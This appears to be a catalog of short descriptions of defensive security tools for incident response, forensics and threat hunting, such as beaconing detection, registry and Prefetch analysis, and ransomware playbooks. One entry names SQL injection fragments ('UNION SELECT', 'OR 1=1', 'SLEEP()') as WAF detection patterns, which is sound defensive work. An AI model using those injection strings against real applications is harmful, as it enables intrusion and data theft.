Incident Response

building-incident-timeline-with-timesketch helps DFIR teams build collaborative incident timelines in Timesketch by ingesting Plaso, CSV, or JSONL evidence, normalizing timestamps, correlating events, and documenting attack chains for incident triage and reporting.

building-incident-response-playbook helps security teams create reusable incident response playbooks with step-by-step phases, decision trees, escalation criteria, RACI ownership, and SOAR-ready structure. It is designed for incident response procedure documentation, incident triage workflows, and audit-friendly operational response plans.

detecting-beaconing-patterns-with-zeek helps analyze Zeek conn.log intervals to detect C2-style beaconing. It uses ZAT, groups flows by source, destination, and port, and scores low-jitter patterns with statistical checks. Ideal for SOC, threat hunting, incident response, and detecting-beaconing-patterns-with-zeek for Security Audit workflows.

The building-phishing-reporting-button-workflow skill helps you design a phishing report button workflow that preserves the original email, extracts IOCs, classifies reports, and routes triage and feedback for Microsoft 365 or similar email security setups.

analyzing-supply-chain-malware-artifacts is a malware-analysis skill for tracing trojanized updates, poisoned dependencies, and build-pipeline tampering. Use it to compare trusted and untrusted artifacts, extract indicators, assess compromise scope, and report findings with less guesswork.

analyzing-security-logs-with-splunk helps investigate security events in Splunk by correlating Windows, firewall, proxy, and authentication logs into timelines and evidence. This analyzing-security-logs-with-splunk skill is a practical guide for Security Audit, incident response, and threat hunting.

analyzing-ransomware-network-indicators helps analyze Zeek conn.log and NetFlow to spot C2 beaconing, TOR exits, exfiltration, and suspicious DNS for Security Audit and incident response.

analyzing-ransomware-leak-site-intelligence helps monitor ransomware data leak sites, extract victim and group signals, and produce structured threat intelligence for incident response, sector risk review, and adversary tracking.

Analyze WAF and audit logs to detect SQL injection campaigns with detecting-sql-injection-via-waf-logs. Built for Security Audit and SOC workflows, it parses ModSecurity, AWS WAF, and Cloudflare events, classifies UNION SELECT, OR 1=1, SLEEP(), and BENCHMARK() patterns, correlates sources, and produces incident-oriented findings.

analyzing-golang-malware-with-ghidra helps analysts reverse engineer Go-compiled malware in Ghidra with workflows for function recovery, string extraction, build metadata, and dependency mapping. The analyzing-golang-malware-with-ghidra skill is useful for malware triage, incident response, and Security Audit tasks that need practical, Go-specific analysis steps.

containing-active-breach is an incident-response skill for live breach containment. It helps isolate hosts, block suspicious traffic, disable compromised accounts, and slow lateral movement using a structured containing-active-breach guide with practical API and script references.

collecting-indicators-of-compromise skill for extracting, enriching, scoring, and exporting IOCs from incident evidence. Use it for Security Audit workflows, threat intel sharing, and STIX 2.1 output when you need a practical collecting-indicators-of-compromise guide instead of a generic incident-response prompt.

building-vulnerability-scanning-workflow helps SOC teams design a repeatable vulnerability scanning process for discovery, prioritization, remediation tracking, and reporting across assets. It supports Security Audit use cases with scanner orchestration, KEV-aware risk ranking, and workflow guidance beyond a one-off scan.

building-soc-playbook-for-ransomware skill for SOC teams that need a structured ransomware response playbook. It covers detection triggers, containment, eradication, recovery, and audit-ready procedures aligned to NIST SP 800-61 and MITRE ATT&CK. Use it for practical playbook creation, tabletop exercises, and Security Audit support.

Use the building-soc-escalation-matrix skill to build a structured SOC escalation matrix with severity tiers, response SLAs, escalation paths, and notification rules. It includes template, standards mapping, workflows, and scripts for practical building-soc-escalation-matrix usage in security operations and audit work.

building-incident-response-dashboard helps teams build real-time incident response dashboards in Splunk, Elastic, or Grafana for active incident tracking, containment status, affected assets, IOC spread, and response timelines. Use this building-incident-response-dashboard skill when you need a focused dashboard for SOC analysts, incident commanders, and leadership.

analyzing-windows-registry-for-artifacts helps analysts extract evidence from Windows Registry hives to identify user activity, installed software, autoruns, USB history, and compromise indicators for incident response or Security Audit workflows.

analyzing-windows-prefetch-with-python parses Windows Prefetch (.pf) files with windowsprefetch to reconstruct execution history, flag renamed or masquerading binaries, and support incident triage and malware analysis.

The analyzing-windows-amcache-artifacts skill parses Windows Amcache.hve data to recover evidence of program execution, installed software, device activity, and driver loading for DFIR and security audit workflows. It uses AmcacheParser and regipy-based guidance to support artifact extraction, SHA-1 correlation, and timeline review.

The analyzing-threat-actor-ttps-with-mitre-attack skill helps map threat reports to MITRE ATT&CK tactics, techniques, and sub-techniques, build coverage views, and prioritize detection gaps. It includes a reporting template, ATT&CK references, and scripts for technique lookup and gap analysis, making it useful for CTI, SOC, detection engineering, and threat modeling.

analyzing-powershell-empire-artifacts skill helps Security Audit teams detect PowerShell Empire artifacts in Windows logs using Script Block Logging, Base64 launcher patterns, stager IOCs, module signatures, and detection references for triage and rule writing.

analyzing-powershell-script-block-logging skill for parsing Windows PowerShell Script Block Logging Event ID 4104 from EVTX files, reconstructing split script blocks, and flagging obfuscated commands, encoded payloads, Invoke-Expression abuse, download cradles, and AMSI bypass attempts for Security Audit work.

The analyzing-persistence-mechanisms-in-linux skill helps investigate Linux persistence after compromise, including crontab jobs, systemd units, LD_PRELOAD abuse, shell profile changes, and SSH authorized_keys backdoors. It is designed for incident response, threat hunting, and security audit workflows with auditd and file-integrity checks.

analyzing-mft-for-deleted-file-recovery helps recover deleted-file metadata and possible path or content evidence by analyzing NTFS $MFT records, $LogFile, $UsnJrnl, and MFT slack space. Built for DFIR and Security Audit workflows with MFTECmd, analyzeMFT, and X-Ways Forensics.